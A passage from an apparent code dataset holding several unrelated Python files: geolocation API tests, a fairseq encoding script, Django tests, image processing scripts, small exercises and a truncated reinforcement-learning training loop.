cv2.imread('/dataset/training/'+pnm_file,0)\r\n\teq = cv2.equalizeHist(pnm)\r\n\t#print(pnm.shape)\r\n\tpnms[:,index*2448:(index+1)*2448] = eq\r\nprint('read over')\r\n\r\nprint('eq over')\r\npnms_3 = demosaicing_CFA_Bayer_Menon2007(pnms)\r\n#print('demosaicing_CFA_Bayer_Menon2007 over')\r\n#print('write')\r\nfor index,name in enumerate(names[(epoch+1)*num:]):\r\n\timage = pnms_3[:,index*2448:(index+1)*2448,:] \r\n\tif not os.path.exists(save_folder+'/'.join(name.split('/')[:-1])):\r\n\t\t\tos.mkdir(save_folder+'/'.join(name.split('/')[:-2]))\r\n\t\t\tos.mkdir(save_folder+'/'.join(name.split('/')[:-1]))\r\n\tcv2.imwrite(save_folder +'.'.join(name.split('.')[:-1])+'.jpg',image)\r\n\t#print(index/num)\r\nt2 = time.time()\r\nprint(t2-t1,'finished')\r\n\t\t","sub_path":"wangxin/test/channel_parrel.py","file_name":"channel_parrel.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"519863593","text":"import uuid\n\nimport requests_mock\nimport simplejson as json\nfrom sqlalchemy import text\n\nfrom ichnaea.api.exceptions import (\n DailyLimitExceeded,\n InvalidAPIKey,\n LocationNotFound,\n ParseError,\n)\nfrom ichnaea.models import (\n ApiKey,\n Radio,\n)\nfrom ichnaea.tests.factories import (\n CellAreaFactory,\n CellFactory,\n WifiFactory,\n)\nfrom ichnaea import util\n\n\nclass BaseLocateTest(object):\n\n url = None\n apikey_metrics = True\n metric = None\n metric_url = None\n not_found = LocationNotFound\n\n @property\n def test_ip(self):\n # accesses data defined in GeoIPTestCase\n return self.geoip_data['London']['ip']\n\n @property\n def ip_response(self): # pragma: no cover\n return {}\n\n def _call(self, body=None, api_key='test', ip=None, status=200,\n headers=None, method='post_json', **kw):\n if body is None:\n body = {}\n url = self.url\n if api_key:\n url += '?key=%s' % api_key\n extra_environ = {}\n if ip is not None:\n extra_environ = {'HTTP_X_FORWARDED_FOR': ip}\n call = getattr(self.app, method)\n if method == 'get':\n return call(url,\n extra_environ=extra_environ,\n status=status,\n headers=headers,\n **kw)\n else:\n return call(url, body,\n content_type='application/json',\n extra_environ=extra_environ,\n 
status=status,\n headers=headers,\n **kw)\n\n def check_response(self, response, status):\n self.assertEqual(response.content_type, 'application/json')\n self.assertEqual(response.charset, 'UTF-8')\n if status == 'ok':\n self.assertEqual(response.json, self.ip_response)\n elif status == 'invalid_key':\n self.assertEqual(response.json, InvalidAPIKey.json_body())\n elif status == 'not_found':\n self.assertEqual(response.json, self.not_found.json_body())\n elif status == 'parse_error':\n self.assertEqual(response.json, ParseError.json_body())\n elif status == 'limit_exceeded':\n self.assertEqual(response.json, DailyLimitExceeded.json_body())\n\n def check_model_response(self, response, model,\n country=None, fallback=None,\n expected_names=(), **kw):\n expected = {'country': country}\n for name in ('lat', 'lon', 'accuracy'):\n if name in kw:\n expected[name] = kw[name]\n else:\n model_name = name\n if name == 'accuracy':\n model_name = 'range'\n expected[name] = getattr(model, model_name)\n\n if fallback is not None:\n expected_names = set(expected_names).union(set(['fallback']))\n\n self.assertEqual(response.content_type, 'application/json')\n self.assertEqual(set(response.json.keys()), expected_names)\n\n return expected\n\n def model_query(self, cells=(), wifis=()):\n query = {}\n if cells:\n query['cellTowers'] = []\n for cell in cells:\n radio_name = cell.radio.name\n if radio_name == 'umts':\n radio_name = 'wcdma'\n cell_query = {\n 'radioType': radio_name,\n 'mobileCountryCode': cell.mcc,\n 'mobileNetworkCode': cell.mnc,\n 'locationAreaCode': cell.lac,\n }\n if getattr(cell, 'cid', None) is not None:\n cell_query['cellId'] = cell.cid\n query['cellTowers'].append(cell_query)\n if wifis:\n query['wifiAccessPoints'] = []\n for wifi in wifis:\n query['wifiAccessPoints'].append({\n 'macAddress': wifi.key,\n })\n return query\n\n\nclass CommonLocateTest(BaseLocateTest):\n # tests for all locate API's incl. 
country\n\n def test_get(self):\n res = self._call(ip=self.test_ip, method='get', status=200)\n self.check_response(res, 'ok')\n\n def test_empty_body(self):\n res = self._call('', ip=self.test_ip, method='post', status=200)\n self.check_response(res, 'ok')\n\n def test_empty_json(self):\n res = self._call(ip=self.test_ip, status=200)\n self.check_response(res, 'ok')\n\n self.check_stats(\n timer=[(self.metric_url, 1)],\n counter=[(self.metric + '.geoip_hit', 1),\n (self.metric_url + '.200', 1),\n (self.metric + '.geoip_city_found', 1)],\n )\n if self.apikey_metrics:\n self.check_stats(\n counter=[(self.metric + '.api_key.test', 1),\n (self.metric + '.api_log.test.geoip_hit', 1)],\n )\n\n def test_error_no_json(self):\n res = self._call('\\xae', method='post', status=400)\n self.check_response(res, 'parse_error')\n if self.apikey_metrics:\n self.check_stats(counter=[self.metric + '.api_key.test'])\n\n def test_error_no_mapping(self):\n res = self._call([1], status=400)\n self.check_response(res, 'parse_error')\n\n def test_error_unknown_key(self):\n res = self._call({'foo': 0}, ip=self.test_ip, status=200)\n self.check_response(res, 'ok')\n\n def test_no_api_key(self, status=400, response='invalid_key'):\n res = self._call(api_key=None, ip=self.test_ip, status=status)\n self.check_response(res, response)\n if self.apikey_metrics:\n self.check_stats(counter=[self.metric + '.no_api_key'])\n\n def test_unknown_api_key(self, status=400, response='invalid_key'):\n res = self._call(api_key='invalid', ip=self.test_ip, status=status)\n self.check_response(res, response)\n if self.apikey_metrics:\n self.check_stats(counter=[self.metric + '.unknown_api_key'])\n\n def test_gzip(self):\n cell = CellFactory.build()\n query = self.model_query(cells=[cell])\n\n body = util.encode_gzip(json.dumps(query))\n headers = {\n 'Content-Encoding': 'gzip',\n }\n res = self._call(body=body, headers=headers,\n method='post', status=self.not_found.code)\n self.check_response(res, 'not_found')\n\n\nclass CommonPositionTest(BaseLocateTest):\n # tests for only the locate_v1 and locate_v2 API's\n\n def test_api_key_limit(self):\n api_key = uuid.uuid1().hex\n self.session.add(ApiKey(valid_key=api_key, maxreq=5, shortname='dis'))\n self.session.flush()\n\n # exhaust today's limit\n dstamp = util.utcnow().strftime('%Y%m%d')\n key = 'apilimit:%s:%s' % (api_key, dstamp)\n self.redis_client.incr(key, 10)\n\n res = self._call(api_key=api_key, ip=self.test_ip, status=403)\n self.check_response(res, 'limit_exceeded')\n\n def test_cell_not_found(self):\n cell = CellFactory.build()\n\n query = self.model_query(cells=[cell])\n res = self._call(body=query, status=self.not_found.code)\n self.check_response(res, 'not_found')\n\n self.check_stats(\n counter=[self.metric + '.api_key.test',\n self.metric + '.api_log.test.cell_miss',\n self.metric_url + '.' 
+ str(self.not_found.code)],\n timer=[self.metric_url])\n\n def test_cell_lte_radio(self):\n cell = CellFactory(radio=Radio.lte)\n self.session.flush()\n\n query = self.model_query(cells=[cell])\n\n res = self._call(body=query)\n self.check_model_response(res, cell)\n\n self.check_stats(\n counter=[self.metric_url + '.200',\n self.metric + '.api_key.test'])\n\n def test_cellarea(self):\n cell = CellAreaFactory()\n self.session.flush()\n\n query = self.model_query(cells=[cell])\n res = self._call(body=query)\n self.check_model_response(res, cell, fallback='lacf')\n\n self.check_stats(\n counter=[self.metric_url + '.200',\n self.metric + '.api_key.test',\n self.metric + '.api_log.test.cell_lac_hit']\n )\n\n def test_cellarea_when_lacf_enabled(self):\n cell = CellAreaFactory()\n self.session.flush()\n\n query = self.model_query(cells=[cell])\n query['fallbacks'] = {'lacf': True}\n\n res = self._call(body=query)\n self.check_model_response(res, cell, fallback='lacf')\n\n self.check_stats(\n counter=[self.metric_url + '.200',\n self.metric + '.api_key.test',\n self.metric + '.api_log.test.cell_lac_hit']\n )\n\n def test_cellarea_when_lacf_disabled(self):\n cell = CellAreaFactory()\n self.session.flush()\n\n query = self.model_query(cells=[cell])\n query['fallbacks'] = {'lacf': False}\n\n res = self._call(body=query, status=self.not_found.code)\n self.check_response(res, 'not_found')\n\n self.check_stats(\n counter=[self.metric_url + '.' + str(self.not_found.code),\n self.metric + '.api_key.test']\n )\n\n def test_cellarea_when_different_fallback_set(self):\n cell = CellAreaFactory()\n self.session.flush()\n\n query = self.model_query(cells=[cell])\n query['fallbacks'] = {'ipf': True}\n\n res = self._call(body=query)\n self.check_model_response(res, cell, fallback='lacf')\n\n self.check_stats(\n counter=[self.metric_url + '.200',\n self.metric + '.api_key.test',\n self.metric + '.api_log.test.cell_lac_hit']\n )\n\n def test_wifi_not_found(self):\n wifis = WifiFactory.build_batch(2)\n\n query = self.model_query(wifis=wifis)\n\n res = self._call(body=query, status=self.not_found.code)\n self.check_response(res, 'not_found')\n\n self.check_stats(\n counter=[self.metric + '.api_key.test',\n self.metric + '.api_log.test.wifi_miss',\n self.metric_url + '.' + str(self.not_found.code)],\n timer=[self.metric_url])\n\n def test_ip_fallback_disabled(self):\n res = self._call(body={\n 'fallbacks': {\n 'ipf': 0,\n }},\n ip=self.test_ip,\n status=self.not_found.code)\n self.check_response(res, 'not_found')\n\n self.check_stats(\n timer=[self.metric_url],\n counter=[self.metric + '.api_key.test',\n self.metric_url + '.' 
+ str(self.not_found.code)],\n )\n\n def test_fallback(self):\n cells = CellFactory.build_batch(2, radio=Radio.wcdma)\n wifis = WifiFactory.build_batch(3)\n api_key = ApiKey.getkey(self.session, 'test')\n api_key.allow_fallback = True\n self.session.flush()\n\n with requests_mock.Mocker() as mock:\n response_location = {\n 'location': {\n 'lat': 1.0,\n 'lng': 1.0,\n },\n 'accuracy': 100,\n }\n mock.register_uri(\n 'POST', requests_mock.ANY, json=response_location)\n\n query = self.model_query(cells=cells, wifis=wifis)\n res = self._call(body=query)\n\n send_json = mock.request_history[0].json()\n self.assertEqual(len(send_json['cellTowers']), 2)\n self.assertEqual(len(send_json['wifiAccessPoints']), 3)\n self.assertEqual(send_json['cellTowers'][0]['radioType'], 'wcdma')\n\n self.check_model_response(res, None, lat=1.0, lon=1.0, accuracy=100)\n\n self.check_stats(\n timer=[self.metric_url],\n counter=[self.metric + '.api_key.test',\n self.metric + '.fallback_hit',\n self.metric_url + '.200',\n self.metric + '.api_log.test.fallback_hit'],\n )\n\n def test_fallback_used_when_geoip_also_present(self):\n cells = CellFactory.build_batch(2, radio=Radio.wcdma)\n wifis = WifiFactory.build_batch(3)\n api_key = ApiKey.getkey(self.session, 'test')\n api_key.allow_fallback = True\n self.session.flush()\n\n with requests_mock.Mocker() as mock:\n response_location = {\n 'location': {\n 'lat': 1.0,\n 'lng': 1.0,\n },\n 'accuracy': 100,\n }\n mock.register_uri(\n 'POST', requests_mock.ANY, json=response_location)\n\n query = self.model_query(cells=cells, wifis=wifis)\n res = self._call(body=query, ip=self.test_ip)\n\n send_json = mock.request_history[0].json()\n self.assertEqual(len(send_json['cellTowers']), 2)\n self.assertEqual(len(send_json['wifiAccessPoints']), 3)\n\n self.check_model_response(res, None, lat=1.0, lon=1.0, accuracy=100)\n\n self.check_stats(\n timer=[self.metric_url],\n counter=[self.metric + '.api_key.test',\n self.metric + '.fallback_hit',\n self.metric_url + '.200',\n self.metric + '.api_log.test.fallback_hit'],\n )\n\n\nclass CommonLocateErrorTest(BaseLocateTest):\n # this is a standalone class to ensure DB isolation for dropping tables\n\n def tearDown(self):\n self.setup_tables(self.db_rw.engine)\n super(CommonLocateErrorTest, self).tearDown()\n\n def test_database_error(self, db_errors=0):\n for tablename in ('wifi', 'cell', 'cell_area',\n 'ocid_cell', 'ocid_cell_area'):\n self.session.execute(text('drop table %s;' % tablename))\n\n cells = CellFactory.build_batch(2)\n wifis = WifiFactory.build_batch(2)\n\n query = self.model_query(cells=cells, wifis=wifis)\n res = self._call(body=query, ip=self.test_ip)\n self.check_response(res, 'ok')\n\n self.check_stats(\n timer=[self.metric_url],\n counter=[\n self.metric_url + '.200',\n self.metric + '.geoip_hit',\n ],\n )\n self.check_raven([('ProgrammingError', db_errors)])\n","sub_path":"ichnaea/api/locate/tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"276427095","text":"#!/usr/bin/env python3\n\n\n__author__ = \"Jonathan Marburger\"\n__version__ = \"0.1.0\"\n__license__ = \"SRU\"\n\n\n\"\"\"function to read the lines of the input file\"\"\"\ndef readFile():\n read = open(\"SchruteStuff.txt\", \"r\")\n out = read.readlines()\n read.close()\n return out\n\n\ndef open_file(fil):\n out_list = open(fil, 'r')\n for line in out_list:\n new_out_list = line.split('x')\n\n def calc_surface(are):\n are.sort()\n\n 
length = int(are[0])\n        height = int(are[1])\n        width = int(are[2])\n\n        slack = length * width\n        surface = (2 * length * width) + (2 * length * height) + (2 * width * height)\n        print(str(surface))\n        max_foil = surface + slack\n        return max_foil\n    def tape(arr):\n        arr.sort()\n\n        length = int(arr[0])\n        height = int(arr[1])\n        width = int(arr[2])\n\n        slack = length * width\n        ribbon = (length * width * height)\n        print(str(ribbon))\n        max_tape = ribbon + slack\n        return max_tape\n\n    temp_surface = calc_surface(new_out_list)\n    print(str(temp_surface))\n\n    summation_foil = 0\n    summation_tape = 0\n\n    summation_foil += temp_surface\n    summation_tape += tape(new_out_list)\n\n    print(summation_foil)\n    print(summation_tape)\n\n\n\"\"\"main function here\"\"\"\n\n\ndef main():\n    filename = input('Input the file you want to use: ')\n    open_file(filename)\n\n    return 0\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"OfficeAssign.py","file_name":"OfficeAssign.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"557207313","text":"#!/usr/bin/env python3 -u\n# Copyright (c) 2017-present, Facebook, Inc.\n# All rights reserved.\n#\n# This source code is licensed under the license found in the LICENSE file in\n# the root directory of this source tree. An additional grant of patent rights\n# can be found in the PATENTS file in the same directory.\n\"\"\"\nTranslate pre-processed data with a trained model.\n\"\"\"\n\nimport torch\n\nfrom fairseq import bleu, data, options, progress_bar, tasks, tokenizer, utils\nfrom fairseq.meters import StopwatchMeter, TimeMeter\nfrom fairseq.sequence_encoder import SequenceEncoder\nimport json\nimport numpy as np\nfrom fairseq.sequence_generator import SequenceGenerator\nimport torch.nn as nn\nfrom fairseq.sequence_scorer import SequenceScorer\n\n\ndef main(args):\n    assert args.path is not None, '--path required for generation!'\n    assert not args.sampling or args.nbest == args.beam, \\\n        '--sampling requires --nbest to be equal to --beam'\n    assert args.replace_unk is None or args.raw_text, \\\n        '--replace-unk requires a raw text dataset (--raw-text)'\n\n    if args.max_tokens is None and args.max_sentences is None:\n        args.max_tokens = 12000\n    print(args)\n\n    use_cuda = torch.cuda.is_available() and not args.cpu\n\n    # Load dataset splits\n    task = tasks.setup_task(args)\n    task.load_dataset(args.gen_subset)\n    print('| {} {} {} examples'.format(args.data, args.gen_subset, len(task.dataset(args.gen_subset))))\n\n    # Set dictionaries\n    src_dict = task.source_dictionary\n    tgt_dict = task.target_dictionary\n    \n    key = None\n    if args.task != 'translation':\n        key = args.source_lang + '-' + args.target_lang\n\n    # Load ensemble\n    print('| loading model(s) from {}'.format(args.path))\n    models, _ = utils.load_ensemble_for_inference(args.path.split(':'), task, model_arg_overrides=eval(args.model_overrides)) # ,pair=key\n\n    for model in models:\n        model.keys = [key]\n\n    # Optimize ensemble for generation\n    for model in models:\n        model.make_generation_fast_(\n            beamable_mm_beam_size=None if args.no_beamable_mm else args.beam,\n            need_attn=args.print_alignment,\n        )\n        if args.fp16:\n            model.half()\n\n    # Load alignment dictionary for unknown word replacement\n    # (None if no unknown word replacement, empty if no path to align dictionary)\n    align_dict = utils.load_align_dict(args.replace_unk)\n\n    # Load dataset (possibly sharded)\n    itr = task.get_batch_iterator(\n        dataset=task.dataset(args.gen_subset),\n        
max_tokens=args.max_tokens,\n max_sentences=args.max_sentences,\n max_positions=utils.resolve_max_positions(\n task.max_positions(),\n *[model.max_positions() for model in models]\n ),\n ignore_invalid_inputs=args.skip_invalid_size_inputs_valid_test,\n required_batch_size_multiple=8,\n num_shards=args.num_shards,\n shard_id=args.shard_id,\n ).next_epoch_itr(shuffle=False)\n\n # Initialize generator\n gen_timer = StopwatchMeter()\n\n encoder = SequenceEncoder(models, task.target_dictionary)\n\n\n if use_cuda:\n encoder.cuda()\n\n pad = options.eval_bool(args.pad)\n\n # Generate and compute BLEU score\n num_sentences = 0\n has_target = True\n with progress_bar.build_progress_bar(args, itr) as t:\n if args.task=='factored_translation':\n encodings = encoder.encode_batched_itr_factored(t, cuda=use_cuda, timer=gen_timer, pad=pad)\n else:\n encodings = encoder.encode_batched_itr(t, cuda=use_cuda, timer=gen_timer,pad=pad)\n data = {}\n i = 0\n for id,src,ref,hypos in encodings:\n if i >= args.n_points:\n break\n data[str(id.cpu().data.numpy())] = {\n 'src':src.cpu().data.numpy().tolist(),\n 'ref':ref.cpu().data.numpy().tolist(),\n 'encoding':hypos[0]['encoding'].cpu().data.numpy().tolist()\n }\n i += 1\n with open(args.output_file,'w') as f:\n json.dump(data,f)\n print('Done')\n\n\nif __name__ == '__main__':\n parser = options.get_generation_parser()\n options.add_encode_args(parser)\n args = options.parse_args_and_arch(parser)\n main(args)\n","sub_path":"encode.py","file_name":"encode.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"624521057","text":"from django.test import TestCase\nfrom django.test import Client\nfrom django.contrib.auth import get_user_model\n\n# Create your tests here.\n\n\nclass CheckUI(TestCase):\n anonymousclient = Client()\n\n @classmethod\n def setUpTestData(cls):\n User = get_user_model()\n cls.user = User.objects.create_user(email='tanfuser@gsa.gov')\n cls.superuser = User.objects.create_superuser(email='tanfsuperuser@gsa.gov')\n cls.staffuser = User.objects.create_user(email='tanfstaff@gsa.gov', is_staff=True)\n\n def test_about(self):\n \"\"\"about page has proper data\"\"\"\n response = self.anonymousclient.get(\"/about/\")\n self.assertIn(b'Welcome to the TANF Data Reporting system', response.content)\n\n def test_authentication(self):\n \"\"\"We cannot get into pages if we are not authenticated\"\"\"\n pages = {\n '/': b'Current user',\n '/status/': b'Current user',\n '/viewquarter/': b'Current user',\n }\n for k, v in pages.items():\n response = self.anonymousclient.get(k)\n self.assertNotEqual(response.status_code, 200)\n self.assertNotIn(v, response.content, msg='anonymous ' + k)\n\n self.client.force_login(self.user)\n response = self.client.get(k)\n self.assertEqual(response.status_code, 200)\n self.assertIn(v, response.content, msg='user ' + k)\n\n self.client.force_login(self.staffuser)\n response = self.client.get(k)\n self.assertEqual(response.status_code, 200)\n self.assertIn(v, response.content, msg='user ' + k)\n\n self.client.force_login(self.superuser)\n response = self.client.get(k)\n self.assertEqual(response.status_code, 200)\n self.assertIn(v, response.content, msg='superuser ' + k)\n\n def test_staffuser_authentication(self):\n \"\"\"We cannot get into admin pages if we are not staff or superuser authenticated\"\"\"\n self.assertTrue(self.staffuser.is_staff)\n\n page = '/useradmin'\n response = self.anonymousclient.get(page)\n 
        self.assertRedirects(response, '/admin/login/?next=/useradmin', status_code=302, target_status_code=200)\n\n        self.client.force_login(self.user)\n        response = self.client.get(page)\n        self.assertRedirects(response, '/admin/login/?next=/useradmin', status_code=302, target_status_code=200)\n\n        self.client.force_login(self.superuser)\n        response = self.client.get(page)\n        self.assertRedirects(response, '/admin/users/tanfuser/', status_code=302, target_status_code=200)\n\n        self.client.force_login(self.staffuser)\n        response = self.client.get(page)\n        self.assertRedirects(response, '/admin/users/tanfuser/', status_code=302, target_status_code=200)\n\n    def test_upload_exists(self):\n        \"\"\"upload page has proper data\"\"\"\n        self.client.force_login(self.user)\n        response = self.client.get(\"/\")\n        self.assertIn(b'Upload to the TANF Data Reporting system', response.content)\n\n    def test_upload_data(self):\n        \"\"\"upload page accepts data, sends us to the Status page, and status page has a file\"\"\"\n        self.client.force_login(self.user)\n        with open('upload/fixtures/testdata.txt') as f:\n            response = self.client.post(\"/\", {'name': 'myfile', 'myfile': f}, follow=True)\n        self.assertIn(b'Status', response.content)\n        self.assertIn(b'tanfuser@gsa.gov_', response.content)\n        self.assertIn(b'_testdata.txt', response.content)\n","sub_path":"upload/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"248147717","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\n\n#import fonctions \n# Create a list of words (8 characters max)\nlisteMot = {\n    0:'vache',\n    1:'musique',\n    2:'ampoule',\n    3:'energie',\n    4:'crabe',\n    5:'crevette',\n}\n\n\n\n# Number of chances\nnmbreChance = 8\n#nmbreChance = fonctions.CompteurChance\n","sub_path":"donnees.py","file_name":"donnees.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"537335628","text":"#program to smooth spectra taking into account the flux uncertainties (ivar)\n#Elisa Toloba, UOP, August 24th 2018\n#-------------------------------\nimport pdb\nimport numpy as np\nfrom astropy.io import fits\n#-------------------------------\ndef gauss_ivar(lamb1, spec1, ivar1, sig):\n\n    lamb2=lamb1\n    n1=len(lamb1)\n    n2=len(lamb2)\n    f=np.arange(n1)\n    spec2=np.empty(n2)\n    ivar2=np.empty(n2)\n\n    dlam=np.repeat(sig, n2)\n    dlambda1=np.diff(lamb1)\n    maxsigma=4.\n    halfwindow=int(np.ceil(1.1*maxsigma*max(dlam)/min(dlambda1)))\n    for i in range(n2):\n        if f[i]-halfwindow <= 0:\n            low=0\n        else:\n            low=f[i]-halfwindow\n\n        if f[i]+halfwindow < (n1-1) and f[i]+halfwindow > 0:\n            high=f[i]+halfwindow\n        else:\n            high=int(n2-1)\n        if low < n1 and low < high:\n            w=np.array(np.where(abs(lamb1[low:high+1]-lamb2[i]) < maxsigma*dlam[i]))+low\n            if len(w) > 0:\n                gauss=np.exp(-1.*(lamb1[w] - lamb2[i])**2/(2.0*dlam[i]**2))\n                temp=ivar1[w]*gauss\n                temp2=np.sum(temp)\n                spec2[i]=np.sum(spec1[w]*temp)/temp2\n                ivar2[i]=temp2**2/np.sum(temp*gauss)\n\n    return spec2, ivar2\n#--------------------------------\n\n","sub_path":"lib/smooth_gauss.py","file_name":"smooth_gauss.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"51435830","text":"import numpy as np\n\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef is_inf(n):\n    return n == float(\"Inf\") or n == float(\"-Inf\")\n\n\ndef mpp_2(img_path, T):\n    im = cv2.imread(img_path, 
cv2.IMREAD_GRAYSCALE)\n    ret, thresh = cv2.threshold(im, 127, 255, 0)\n    edges = np.zeros(im.shape)\n    _, contours, _ = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n    mpp_ls = []\n    p1 = contours[0][0, 0, :]\n    p2 = contours[0][1, 0, :]\n    dx = p2[0] - p1[0]\n    dy = p2[1] - p1[1]\n    slope = dy / dx\n    intercept = p1[1] - slope * p1[0]\n    error = 0\n    prev = p2\n    x_const = p2[0]\n    for i in range(2, contours[0].shape[0]):\n        p = contours[0][i, 0, :]\n        if not is_inf(slope) or slope == 0:\n            yp = slope * p[0] + intercept\n            error = error + abs(yp - p[1])\n        else:\n            if is_inf(slope):\n                xp = x_const\n            else:\n                xp = (1 / slope) * (p[1] - intercept)\n            error = error + abs(xp - p[0])\n\n        if error > T:\n            mpp_ls.append(p)\n            error = 0\n            dx = p[0] - prev[0]\n            dy = p[1] - prev[1]\n            x_const = p[0]\n            slope = float(dy) / dx\n            intercept = p[1] - slope * p[0]\n\n        prev = p\n\n    vertices = len(mpp_ls)\n    mpp_np = np.array(mpp_ls)\n    mpp_np = np.expand_dims(mpp_np, 1)\n    pts = mpp_np.reshape((-1, 1, 2))\n    cv2.polylines(edges, [pts], True, (255, 255, 255))\n    return edges, vertices\n\n\nimg_0, v_0 = mpp_2(\"img2.png\", -1)\nimg_5, v_5 = mpp_2(\"img2.png\", 5)\nimg_10, v_10 = mpp_2(\"img2.png\", 10)\nimg_20, v_20 = mpp_2(\"img2.png\", 20)\nimg_40, v_40 = mpp_2(\"img2.png\", 40)\nimg_80, v_80 = mpp_2(\"img2.png\", 80)\nimg_160, v_160 = mpp_2(\"img2.png\", 160)\n\nplt.figure(figsize=(13, 13))\nplt.subplot(231), plt.imshow(img_0, cmap='gray'), plt.title(str(v_0))\nplt.xticks([]), plt.yticks([])\nplt.subplot(232), plt.imshow(img_5, cmap='gray'), plt.title(str(v_5))\nplt.xticks([]), plt.yticks([])\nplt.subplot(233), plt.imshow(img_10, cmap='gray'), plt.title(str(v_10))\nplt.xticks([]), plt.yticks([])\nplt.subplot(234), plt.imshow(img_20, cmap='gray'), plt.title(str(v_20))\nplt.xticks([]), plt.yticks([])\nplt.subplot(235), plt.imshow(img_40, cmap='gray'), plt.title(str(v_40))\nplt.xticks([]), plt.yticks([])\nplt.subplot(236), plt.imshow(img_80, cmap='gray'), plt.title(str(v_80))\nplt.xticks([]), plt.yticks([])\n\nplt.show()\n","sub_path":"MPP_2.py","file_name":"MPP_2.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"318525271","text":"# 1 dictionary with Russian letters as keys and their English transliterations as values\n# 2 get a word from the user\n# 3 convert it to a string\n# 4 loop over every character and append the matching dictionary value to a new list\n# 5 join the list into a string\n# 6 show the user the result\n\n# Russian list\nletRu = 'а б в г д е ё ж з и й к л м н о п р с т у ф х ц ч ш щ ъ ы ь э ю я'.split()\n# English list\nletEN = 'a b v g d e yo zh z i j k l m n o p r s t u f h c ch sh shch \" y \\' e yu ya'.split()\n\n# Function to build a dictionary from 2 lists\ndef slovar(ru,en):\n    translit_ruls = {}\n    a = 0\n    b = 0\n    # Merge the lists into a dictionary\n    for i in ru :\n        translit_ruls[ ru[a] ] = en[b]\n        a+= 1\n        b+= 1\n\n    Letter_ru.update(translit_ruls )\n    # Letter_ru = translit_ruls.copy() WHY THE HELL DOESN'T IT WORK???????????????????\n# Declaring the dictionary\nLetter_ru = {}\n# Call the function that merges the lists into the dictionary ^\nslovar(letRu,letEN)\n\nSlovo = input()\n# Slovo.lower()\n# print(Slovo)\na = list(Slovo.lower())\nprint(a)\ns ,b = '',''\nfor i in a:\n    b = Letter_ru.get(i)\n    s = s + b\nprint(s.title())\n\nprint('prive')","sub_path":"python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"180326561","text":"a = [ \"apple\", \"banana\", \"carrot\", \"donut\" ]\r\nb = a\r\nb.remove(\"apple\")\r\nc = a + [ \"eclair\" ]\r\nd = c[1:]\r\nd.insert(2, \"fig\")\r\n\r\nprint(a)\r\nprint(b)\r\nprint(c)\r\nprint(d)\r\n\r\n\r\n\r\n\r\n\r\nmyList = [\"a\", \"b\", 1, 2, 3, 2, 4, 6, 10, 20, 30]\r\nhalf = len(myList) // 2\r\nfor i in range(half):\r\n print(myList[i], myList[i + half])\r\n","sub_path":"lists on check 3 written.py","file_name":"lists on check 3 written.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"598735491","text":"import torch\nfrom torch.autograd import Variable\nimport random\nfrom transition import Transition\n\n# Discount factor for future rewards, and Greedy Epsilon Constant:\nGAMMA = 0.5\nEPS = 0.05\n\n\ndef train(model, epoch, optimizer, train_loader, args, writer, reinforcement_learner, request_dict, accuracy_dict, episode):\n\n # Initialize training:\n model.train()\n\n batch_correct = 0.0\n batch_predict = 0.0\n batch_request = 0.0\n batch_reward = 0.0\n\n for b in range(args.batch_size):\n \n # Collect a random batch:\n image_batch, label_batch = train_loader.__iter__().__next__()\n\n # Keep a memory of the episode:\n transitions = []\n\n # Episode Statistics:\n episode_correct = 0.0\n episode_predict = 0.0\n episode_request = 0.0\n episode_reward = 0.0\n\n # Create initial state:\n state = []\n label_dict = []\n for i in range(args.mini_batch_size):\n state.append([0 for i in range(args.class_vector_size)])\n label_dict.append({})\n\n # Initialize model between each episode:\n hidden = model.reset_hidden(args.mini_batch_size)\n\n # Statistics again: \n for v in request_dict.values():\n v.append([])\n for v in accuracy_dict.values():\n v.append([])\n\n # Placeholder for loss Variable:\n if (args.cuda):\n loss = Variable(torch.zeros(args.mini_batch_size).type(torch.Tensor)).cuda()\n else:\n loss = Variable(torch.zeros(args.mini_batch_size).type(torch.Tensor))\n\n # EPISODE LOOP:\n for i_e in range(len(label_batch)):\n\n # Zeroing accumulated gradients:\n optimizer.zero_grad()\n\n episode_labels = label_batch[i_e]\n episode_images = image_batch[i_e]\n\n # Tensoring the state:\n state = torch.FloatTensor(state)\n \n # Need to add image to the state vector:\n flat_images = episode_images.squeeze().view(args.mini_batch_size, -1)\n\n # Concatenating possible labels/zero vector with image, to create the environment state:\n state = torch.cat((state, flat_images), 1)\n \n one_hot_labels = []\n for i in range(args.mini_batch_size):\n true_label = episode_labels[i]\n\n # Creating one hot labels:\n one_hot_labels.append([1 if j == true_label else 0 for j in range(args.class_vector_size)])\n\n # Logging statistics:\n if (true_label not in label_dict[i]):\n label_dict[i][true_label] = 1\n else:\n label_dict[i][true_label] += 1\n\n # Selecting an action to perform (Epsilon Greedy):\n if (args.cuda):\n q_values, hidden = model(Variable(state).type(torch.FloatTensor).cuda(), hidden)\n else:\n q_values, hidden = model(Variable(state).type(torch.FloatTensor), hidden)\n\n # Choosing the largest 